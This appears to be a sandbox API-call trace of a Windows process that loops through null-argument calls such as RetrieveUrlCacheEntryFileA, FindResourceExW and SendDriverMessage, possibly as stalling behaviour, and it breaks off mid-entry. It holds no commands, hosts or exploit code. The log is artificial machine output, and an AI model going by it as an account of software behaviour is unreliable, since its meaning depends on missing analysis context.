0 [0185.945] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.945] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.945] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.945] GetUserDefaultLangID () returned 0x409 [0185.945] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.945] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.945] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.945] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.945] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.945] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.945] GetUserDefaultLangID () returned 0x409 [0185.945] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.945] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.945] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.945] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.945] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.945] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.945] GetUserDefaultLangID () returned 0x409 [0185.945] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.945] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.945] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.945] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.946] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.946] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.946] GetUserDefaultLangID () returned 0x409 [0185.946] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.946] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.946] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.946] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.946] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.946] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.946] GetUserDefaultLangID () returned 0x409 [0185.946] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.946] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.946] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.946] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.946] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.946] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.946] GetUserDefaultLangID () returned 0x409 [0185.946] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.946] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.946] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.946] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.946] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.946] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.946] GetUserDefaultLangID () returned 0x409 [0185.946] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.946] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.946] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.946] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.946] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.946] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.946] GetUserDefaultLangID () returned 0x409 [0185.946] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.946] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.946] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.946] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.946] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.946] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.946] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.946] GetUserDefaultLangID () returned 0x409 [0185.947] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.947] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.947] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.947] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.947] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.947] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.947] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.947] GetUserDefaultLangID () returned 0x409 [0185.947] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.947] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.947] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.947] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.947] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.947] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.947] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.947] GetUserDefaultLangID () returned 0x409 [0185.947] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.947] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.947] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.947] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.947] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.947] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.947] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.947] GetUserDefaultLangID () returned 0x409 [0185.947] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.947] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.948] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.948] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.948] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.948] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.948] GetUserDefaultLangID () returned 0x409 [0185.948] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.948] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.948] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.948] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.948] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.948] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.948] GetUserDefaultLangID () returned 0x409 [0185.948] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.948] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.948] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.948] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.948] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.948] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.948] GetUserDefaultLangID () returned 0x409 [0185.948] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.948] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.948] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.948] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.948] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.948] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.948] GetUserDefaultLangID () returned 0x409 [0185.948] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.948] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.948] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.948] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.948] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.948] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.948] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.949] GetUserDefaultLangID () returned 0x409 [0185.949] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.949] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.949] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.949] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.949] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.949] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.949] GetUserDefaultLangID () returned 0x409 [0185.949] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.949] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.949] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.949] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.949] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.949] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.949] GetUserDefaultLangID () returned 0x409 [0185.949] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.949] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.949] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.949] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.949] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.949] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.949] GetUserDefaultLangID () returned 0x409 [0185.949] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.949] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.949] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.949] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.949] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.949] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.949] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.949] GetUserDefaultLangID () returned 0x409 [0185.949] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.950] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.950] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.950] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.950] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.950] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.950] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.950] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.950] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.950] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.950] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.950] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.950] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.950] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.950] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.950] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.950] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.951] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.952] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.952] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.952] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.952] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.952] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.952] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.952] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.952] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.992] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.992] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.992] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.992] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.992] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.992] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.992] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.992] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.992] SendDriverMessage 